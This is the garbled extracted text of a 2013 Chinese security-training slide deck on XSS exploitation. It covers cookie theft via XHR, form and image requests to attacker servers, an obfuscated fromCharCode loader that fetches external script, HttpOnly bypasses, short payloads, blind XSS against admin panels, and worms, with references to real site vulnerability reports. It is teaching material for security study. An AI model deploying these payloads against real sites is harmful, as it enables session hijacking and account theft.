XSS利用与挖掘- 更新版

1、PKAV-EDU含有XSS攻击代码的页面Cookies数据使用cookies数据登录alert(1)alert(document.cookie)Xsser.mePython Perl Php Any other scripts!33/xssexploit/1.request.htm方式一AJAXXMLHttpRequestIEChrome同域请求ActiveXObject(Microsoft.XMLHTTP)ActiveXObject(MSXML2.XMLHTTP)XMLHttpRequest跨域请求XDomainRequestXMLHttpRequestva

2、r a = window.XMLHttpRequest();a.open(GET,URL?数据,true);a.send(null);open(POST,URL,true);send(数据);跨域Access-Control-Allow-OriginAccess-Control-Allow-MethodsAccess-Control-Allow-Headers跨域请求可以发送数据但不能接受数据数据库邮箱方式二/xssexploit/2.formpost.htm/提交表单document.getElementById(x).submit();方式三http:/192

3、.168.1.133/xssexploit/3.image.htmvar x = new Image();x.src=URL?数据;除了获取cookies，我们通常还需要做其它邪恶的事情1. 获取用户资料2. 获取当前页面内容3. 传播消息 导致蠕虫JS小段代码调用XSS插入我们需要执行的一系列操作静态创建动态创建var s=document.createElement(script);s.src=JS地址;(document.body|document.documentElement).appendChild(s);jsBody图片方式调用外部JSalert(1) 调用外部JSeval(St

4、ring.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,116,46,115,105,110,97,97,112,112,46,99,111,109,47,109,46,106,115,34,59,40,100,1

5、11,99,117,109,101,110,116,46,98,111,100,121,124,124,100,111,99,117,109,101,110,116,46,100,111,99,117,109,101,110,116,69,108,101,109,101,110,116,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59);Flash 方式调用外部JS$.getScript主公救我！jQuery君企鹅君new QZFL.jsLoader().load(/ 调用外部JSalert(1)iframe到攻击页面中&

6、amp;singertype=othe style=display:none实例演示http:/ gainover ./qq.txt noproxy一大波Cookies!脚本一大波请求1. 找代理2. 分发给WEBSHELL什么是Http-only!bool setcookie ( string name , string value , int expire , string path , string domain , bool secure , bool httponly )PHP 5.2.0int setcookie(string name, string value, int exp

7、ire, string path, string domain, int secure);PHP 5.2.0When TRUE the cookie will be made accessible only through the HTTP protocol. This means that the cookie wont be accessible by scripting languages, such as JavaScript. 只能用于传输，而不能被脚本获取 对比抓包得到的对比抓包得到的Cookies数据与数据与document.cookie !document.cookie.spl

8、it(;).join(n)抓包工具抓取的cookies壮哉我大Chrome调试工具！方式一、 HTTP Trace (CROSS-SITE TRACING, XST)IE6时代的 http-only绕过技术古为今用！插件：Siverlight Flash - Java方式二、探针文件 （phpinfo.php）http:/localhost/xssexploit/9.phpinfo_exp.htm#name=(function()var x=new XMLHttpRequest();x.open(GET,./9.phpinfo.php,false);x.send(null);var c=x.r

9、esponseText|;c=c.match(/td+?_SERVERHTTP_COOKIEtd+?(wW+?)/)|,;console.log(c1);)()方式三、WEB服务器漏洞 Apache2.2.22 (CVE-2012-0053)/bugs/wooyun-2012-07050新浪微博COOKIES盗取/bugs/wooyun-2010-07085淘宝网COOKIES盗取/bugs/wooyun-2010-020583腾讯某论坛XSS攻击，获取httponlyPKA

10、V10.apache.400关键时候！ 长度不够怎么办？专治各种不孕不育？小药丸？尼尼玛玛！我说的是利用代码太长，输入点长度不够！15个选项20个字符17个字符/*img title=*/*img title=*/onload=alert(1)30个字符onload= 9 个字符JS代码 21个字符真装不下了！模型一模型二27个字符30个字符g_userProfile.descQZFL.imports(/ 哪些尸体可以借？;eval(qUserInfo.spaceName)/ - 可控的JS变量;eval(M.innerHTML)/ - 21个长度;eval(M.title)/ -17个长度;

11、eval(M.name)/ -16个长度;eval(M.alt)/ -15个长度;eval(M.src)/ -15个长度xxxxxxxx注意在https页面中调用http的JS文件，会被浏览器拦截这一问题！支持https的，比如 GAE （*, 各种被墙中 .）测试代码见：11.https-http.txt信息入侵控制如何接触管理员？信息收集水坑攻击目标网站交互点传统XSSBlind XSS有QQ的不一定是人，还有可能是禽兽！难度大！金玉其外, 败絮其中!开发开发：只有管理人员使用，何必做的那么完美？页面简陋！毫无过滤姓名： 建议：前台 (攻击者可见)后台 (管理员可见)姓名姓名建议建议gai

12、nover软件标题字太小gainover软件标题字太小攻击者最初是看不见后台是什么样子的！故而叫盲打盲打！方法方法：不管3721，见到框框就输入代码！1. 姓名: 输出点 2. 姓名: 3. 建议: 输出点 4. 建议: var data=sug: 输出点 ;虽然看不见，但是可以想象！ (12.bind.xss.exp.txt)/bugs/wooyun-2010-09547用xss平台沦陷百度投诉中心后台/bugs/wooyun-2010-010989/bugs/wooyun

13、-2010-011169手机feedback xss盲打金山词霸UED中心 (2集连播)/bugs/wooyun-2010-09549雪球网xss盲打后台功能较多的后台各种其它漏洞！某公交集团盲打到获取shell/bugs/wooyun-2010-023496意见建议WooYun-2012-09547WooYun-2012-14869注册资料WooYun-2013-18049手机客户端WooYun-2012-12308WooYun-2012-11978文章发布文章发布WooYun-2013-22125注册资料Woo

14、Yun-2013-18049中奖短信中奖短信1. Session过期问题！解决办法解决办法：Keep Session 程序，即利用一个小程序，获取我们所获得的Cookies数据，每隔一段时间访问目标网站页面，防止Session失效！2. Cookies有http-only、后台在内网被隔离、访问IP受限等。解决办法解决办法：尝试使用XSS获取后台页面数据，返回本地后进行分析是否存在可以利用的链接，未发现，继续获取子页面内容进行分析。操作繁琐，需要重复使用XSS盲打！猥琐小技巧猥琐小技巧：后台打不到，可以直接插一个QQ的XSS过去！管理员管理员QQ名单名单被我们修改的首页链接！被我们修改的首页链

15、接！没事别进草，小心没事别进草，小心XSS！视频视频Demo: http:/ 3.5 xss get shell/bugs/wooyun-2010-0171891. 开源程序2. 后台存在getshell权限3. 后台存在XSS漏洞(直接)或网站其它存在XSS漏洞(间接)下载下载：/wordpress-3.5.zip实例演示Demo Code 13.wordpress.getshell.htmXSS点对点，点对点，XSS直接发挥作用直接发挥作用，获取用户信息，获取用户信息1. 微博私信2. IM3. 客户端4. 邮箱

16、腾讯微博私信存储型XSS百度某IM通讯产品存储型XSS腾讯WEBQQ聊天功能XSS - 附带消息蠕虫代码 新浪微博私信处存储型XSSQQ空间礼物功能XSS可以攻击任意指定QQ号码用户腾讯QQ聊天框XSS当 |XSS蠕虫| 与 |QQ系统消息推送| 双剑合璧之后 QQ邮箱XSS，邮件中可调用外部javascript文件QQ邮箱XSS，音乐功能导致邮件加载任意javascript/bugs/wooyun-2012-04841某处XSS可导致账号持久劫持 XSS点对点，点对点，XSS不能不能直接发挥作用直接发挥作用clickjackingphishing诱骗的

17、目的：1. 让不能自动触发的JS被点击触发 2. 获取更为直接的密码信息http:/ 直接在当前页面动态模拟创建登录窗口2. 通过location.href=javascript:HTML内容的方式重写当前页面内容，浏览器URL保持不变，或者通过设置为假的URL。history.pushState(,xxx,/cgi-bin/loginpage)基本信息收集基本信息收集经常上哪些网站？网站1网站2.挑出容易被攻陷的网站拿下网站，种下拿下网站，种下XSS代码代码直接拿下控制权网站存在存储型XSS烽火戏诸侯,只为博伊人一笑访问网站Cookies数据从 得知李老师会上36kr36kr 文章页面使用了

18、 denglu.cc 的评论插件存储型XSSQQ某DOM XSS蹲！有一种存储型XSS叫 self xss ！翻译成中文： 自X ！XSS某商城个人资料某商城个人资料1提交这个页面只有自己能看到！只能自己X自己。XSS某商城个人资料某商城个人资料黑客构造页面提交修改资料的请求内含XSS代码受害者点开页面XSS Rookit !CSRF反射型XSS受害者http:/ j(w)window.s=document.createElement(script);window.s.src=/ Xss。http:/ 商城及类似网站的个人信息页面2. 博客，邮箱等程序的设置/配置页面1. 传统的存储型XSS2

19、. 存储在本地的信息所导致的XSS cookies/storage/local database3. 第三方插件，例如FLASH的本地存储（ shared objcet ）- 淘宝某处存储型XSS漏洞 (WooYun-2013-22080)- 当当网：二级域反射XSS变身所有域下存储XSS(WooYun-2013-17527)攻击者受害者系统消息推送点开系统消息自定义页面FLASH XSS偷取COOKIESI获取好友列表推送系统消息受害者好友群中了XSS以后！获取关系列表发布信息受害者受害者受害者受害者循环！循环！不能有验证码！不能有验证码！获取发布信息所需的参数发布信息XSSXSSXSS受害

20、者攻击者被XSS后！二级受害者虚假消息！信任http:/ info=apptype=1;appdisplaytype=1;appid=/./././././windows/;appname=登录管家;appver=056;iconurl=http:/ pluginbar, InstallAppItem, , info);360安全浏览器远程代码执行安全浏览器远程代码执行漏洞漏洞浏览器会在特定的域下提供一些高权限操作360允许在下执行高权限操作QQ会允许域名下的代码调用soso工具栏的COM组件浏览器中部分UI也是由网页完成的，这些页面存在XSS导致高权限操作！浏览器历史记录Chrome浏览器插件xsser.me的跨站漏洞遨游浏览器xss 0day遨游浏览器命令执行漏洞maxthon.io.File.createTempFilemaxthon.io.FileWgram.Program.launchPKAV-EDU多问多想多做THANKSPKAV-EDU见另外一份PPT2013-03-31QQ